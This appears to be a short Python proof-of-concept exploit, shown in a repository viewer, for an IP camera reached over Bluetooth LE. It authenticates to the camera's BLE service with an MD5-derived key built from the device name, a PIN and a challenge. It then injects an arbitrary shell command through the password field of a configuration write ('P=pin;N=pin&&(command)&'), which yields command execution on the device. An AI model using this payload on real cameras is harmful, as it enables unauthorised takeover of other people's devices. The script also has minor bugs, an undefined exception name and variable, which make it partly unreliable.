blob: 58dd478df0741556879ac53d710190c6cf4f39ec (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
|
#!/usr/bin/python3
import sys
import hashlib
import base64
from bluepy.btle import Peripheral
class BleCam(object):
def __init__(self, address, pincode, command=None):
self.pincode = pincode
self.command = command
self.periph = Peripheral(address)
self.ipcamservice()
self.name = self.periph.getCharacteristics(uuid=0x2a00)[0].read().decode() # wellknown name characteristic
self.dumpchars()
self.experiment()
def ipcamservice(self):
try:
print("getting IPCam service")
self.service = self.periph.getServiceByUUID(0xD001)
except BTLEEException:
print("no IPCam service found for %s" % periph.address)
def dumpchars(self):
handles = self.service.getCharacteristics()
for h in handles:
print("%s - Handle=%#06x (%s)" % (h.uuid, h.getHandle(), h.propertiesToString()))
def experiment(self):
auth = self.service.getCharacteristics(0xa001)[0]
tmp = auth.read().decode().split(";", 10)
for t in tmp:
if t.startswith("C="):
self.challenge=t.split("=",2)[1]
hashit = self.name + self.pincode + self.challenge
self.key = base64.b64encode(hashlib.md5(hashit.encode()).digest())[:16]
try:
auth.write("M=0;K=".encode() + self.key, True)
except:
print("write failed")
print("ip config is %s" % self.service.getCharacteristics(0xa104)[0].read())
if self.command != None:
run = "P=" + self.pincode + ";N=" + self.pincode + "&&(" + self.command + ")&"
try:
self.service.getCharacteristics(0xa201)[0].write(run.encode(), True)
except:
print("write failed")
if __name__ == '__main__':
if len(sys.argv) < 3:
print("Usage: {} <addr> <pincode>".format(sys.argv[0]))
sys.exit(1)
if len(sys.argv) > 3:
BleCam(sys.argv[1], sys.argv[2], sys.argv[3])
else:
BleCam(sys.argv[1], sys.argv[2])
print("Done.")
|